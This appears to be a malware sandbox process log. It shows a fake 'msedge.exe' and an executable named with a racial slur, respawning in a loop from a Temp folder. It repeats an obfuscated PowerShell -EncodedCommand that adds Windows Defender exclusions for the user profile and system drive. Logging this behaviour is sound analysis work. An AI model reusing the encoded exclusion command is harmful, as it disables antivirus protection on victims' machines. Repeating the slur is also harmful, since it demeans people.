        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        132⤵
        
        PID:3060
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        133⤵
        
        PID:4032
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        133⤵
        
        PID:3292
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        133⤵
        
        PID:1936
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        134⤵
        
        PID:3168
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        134⤵
        
        PID:876
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        134⤵
        
        PID:1372
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        135⤵
        
        PID:1748
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        135⤵
        
        PID:2268
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        135⤵
        
        PID:3684
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        136⤵
        
        PID:1544
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        136⤵
        
        PID:2160
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        136⤵
        
        PID:3996
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        137⤵
        
        PID:4080
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        137⤵
        
        PID:4076
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        137⤵
        
        PID:3156
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        138⤵
        
        PID:3696
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        138⤵
        
        PID:904
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        138⤵
        
        PID:3532
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        139⤵
        
        PID:3508
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        139⤵
        
        PID:2996
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        139⤵
        
        PID:3880
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        140⤵
        
        PID:2244
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        140⤵
        
        PID:2732
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        140⤵
        
        PID:3936
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        141⤵
        
        PID:2692
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        141⤵
        
        PID:2640
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        141⤵
        
        PID:2832
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        142⤵
        
        PID:2528
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        142⤵
        
        PID:1040
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        142⤵
        
        PID:1136
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        143⤵
        
        PID:2580
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        143⤵
        
        PID:3344
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        143⤵
        
        PID:2360
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        144⤵
        
        PID:3392
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        144⤵
        
        PID:3448
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        144⤵
        
        PID:1228
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        145⤵
        
        PID:2344
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        145⤵
        
        PID:1684
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        145⤵
        
        PID:3640
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        146⤵
        
        PID:1388
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        146⤵
        
        PID:3296
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        146⤵
        
        PID:996
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        147⤵
        
        PID:3776
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        147⤵
        
        PID:592
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        147⤵
        
        PID:2780
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        148⤵
        
        PID:2944
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        148⤵
        
        PID:2680
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        148⤵
        
        PID:3428
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        149⤵
        
        PID:3712
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        149⤵
        
        PID:3124
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        149⤵
        
        PID:3364
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        150⤵
        
        PID:2276
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        150⤵
        
        PID:3628
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        150⤵
        
        PID:3864
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        151⤵
        
        PID:1468
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        151⤵
        
        PID:2816
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        151⤵
        
        PID:3400
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        152⤵
        
        PID:4012
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        152⤵
        
        PID:2056
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        152⤵
        
        PID:800
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        153⤵
        
        PID:2148
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        153⤵
        
        PID:3468
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        153⤵
        
        PID:3908
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        154⤵
        
        PID:2948
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        154⤵
        
        PID:3504
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        154⤵
        
        PID:2652
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        155⤵
        
        PID:764
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        155⤵
        
        PID:3424
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        155⤵
        
        PID:3632
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        156⤵
        
        PID:1956
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        156⤵
        
        PID:3984
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        156⤵
        
        PID:2756
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        157⤵
        
        PID:1660
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        157⤵
        
        PID:2412
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        157⤵
        
        PID:2100
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        158⤵
        
        PID:3784
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        158⤵
        
        PID:916
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        158⤵
        
        PID:2828
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        159⤵
        
        PID:1552
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        159⤵
        
        PID:1224
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        159⤵
        
        PID:2420
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        160⤵
        
        PID:3440
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        160⤵
        
        PID:4052
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        160⤵
        
        PID:3524
        
